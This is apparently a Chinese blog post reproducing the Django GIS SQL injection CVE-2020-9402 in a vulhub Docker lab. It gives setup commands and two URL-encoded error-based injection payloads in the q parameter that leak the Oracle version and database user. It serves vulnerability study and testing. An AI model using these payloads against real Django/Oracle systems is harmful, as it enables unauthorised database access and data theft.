vulhub Django GIS SQL注入漏洞复现

漏洞简介

漏洞编号

CVE-2020-9402

漏洞介绍

CVE-2020-9402:在Oracle上的GIS函数和聚合中通过公差参数进行潜在的SQL注入

影响版本

  1. Django master branch
  2. Django 3.0
  3. Django 2.2
  4. Django 1.11

环境搭建

cd vulhub/django/CVE-2020-9402
docker-compose up -d

 漏洞复现

第一个注入点

进入容器中通过 sqlplus 命令查看 Oracle 数据库的版本号

docker ps
docker exec -it 容器ID /bin/bash
sqlplus

访问 your-ip:8000/vuln/ 查看靶场是否成功启动

通过get方法在q参数处构建payload

http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

网页报错,注入成功获取到Oracle的版本信息

 第二个注入点

your-ip:8000/vuln2/?q=0.05

 同样在q参数处构建payload完成报错注入

http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值